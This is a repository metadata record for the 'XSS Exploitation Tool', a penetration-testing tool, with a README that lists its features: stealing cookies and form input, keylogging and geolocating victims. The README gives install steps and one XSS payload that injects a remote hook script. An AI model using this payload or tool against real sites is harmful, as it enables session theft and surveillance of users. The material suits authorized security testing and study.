{"id":13640910,"url":"https://github.com/Sharpforce/XSS-Exploitation-Tool","last_synced_at":"2025-04-20T07:31:19.814Z","repository":{"id":111742329,"uuid":"240079876","full_name":"Sharpforce/XSS-Exploitation-Tool","owner":"Sharpforce","description":"An XSS Exploitation Tool","archived":false,"fork":false,"pushed_at":"2024-09-17T19:21:19.000Z","size":10803,"stargazers_count":257,"open_issues_count":0,"forks_count":51,"subscribers_count":7,"default_branch":"main","last_synced_at":"2024-09-18T04:01:09.680Z","etag":null,"topics":["cross-site-scripting","xss","xss-attacks"],"latest_commit_sha":null,"homepage":"https://sharpforce.gitbook.io/cybersecurity/mes-projets/xss-exploitation-tool","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Sharpforce.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-02-12T18:02:19.000Z","updated_at":"2024-09-17T19:21:23.000Z","dependencies_parsed_at":"2024-06-06T13:05:05.593Z","dependency_job_id":"78e3d1ab-bf53-439f-9e60-3fe02ff0d7d9","html_url":"https://github.com/Sharpforce/XSS-Exploitation-Tool","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sharpforce%2FXSS-Exploitation-Tool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sharpforce%2FXSS-Exploitation-Tool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sharpforce%2FXSS-Exploitation-Tool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sharpforce%2FXSS-Exploitation-Tool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Sharpforce","download_url":"https://codeload.github.com/Sharpforce/XSS-Exploitation-Tool/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223821955,"owners_count":17208770,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cross-site-scripting","xss","xss-attacks"],"created_at":"2024-08-02T01:01:15.663Z","updated_at":"2025-04-20T07:31:19.800Z","avatar_url":"https://github.com/Sharpforce.png","language":"JavaScript","funding_links":[],"categories":["PHP"],"sub_categories":[],"readme":"# XSS Exploitation Tool\n\nXSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.\n\n# Features\n\n- Technical Data about victim browser\n- Geolocation of the victim\n- Snapshot of the hooked/visited page\n- Source code of the hooked/visited page\n- Exfiltrate input field data\n- Exfiltrate cookies\n- Keylogging\n- Display alert box\n- Redirect user\n\n# Installation\n\n## Using Docker\n\nBuild the image:\n```\n$ docker-compose -f docker-compose.yml up -d\n```\n\nThis will spin up the server and the database, visit the page http://localhost:8000 to see the XSS Exploitation Tool interface.\n\n## On host\n\n\u003e Tested on Debian 12\n\nInstall Git and pull the XSS-Exploitation-Tool source code:\n\n```\n$ sudo apt-get install git\n$ cd /tmp\n$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git\n```\n\nInstall XET:\n\n```\n$ cd ./XSS-Exploitation-Tool/bin/\n$ sudo chmod +x ./install.sh\n$ sudo ./install.sh\n```\n\nVisit the page http://localhost:8000 to see the XSS Exploitation Tool interface.\n\n# How it works\n\nAccess the file `index.html`: http://localhost:8000/demo/ or exploit a Cross-Site Scripting vulnerability to insert the Javascript hook file:\n\n```\n?vulnerable_param=\u003cscript src=\"http://localhost:8000/hook.js\"/\u003e\n```\n\nThen, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers.\n\n# Demo\n\n![](https://github.com/Sharpforce/XSS-Exploitation-Tool/blob/main/public/demo/images/demo-xet.gif)\n\n## Disclaimer\n\nThis tool is intended for educational purposes only and should be used exclusively in authorized penetration testing environments. Unauthorized access to or use of systems that you do not own is illegal. The author is not responsible for any misuse of this tool.\n\n## License\n\nThis project is licensed under the GPL-3.0.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSharpforce%2FXSS-Exploitation-Tool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FSharpforce%2FXSS-Exploitation-Tool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSharpforce%2FXSS-Exploitation-Tool/lists"}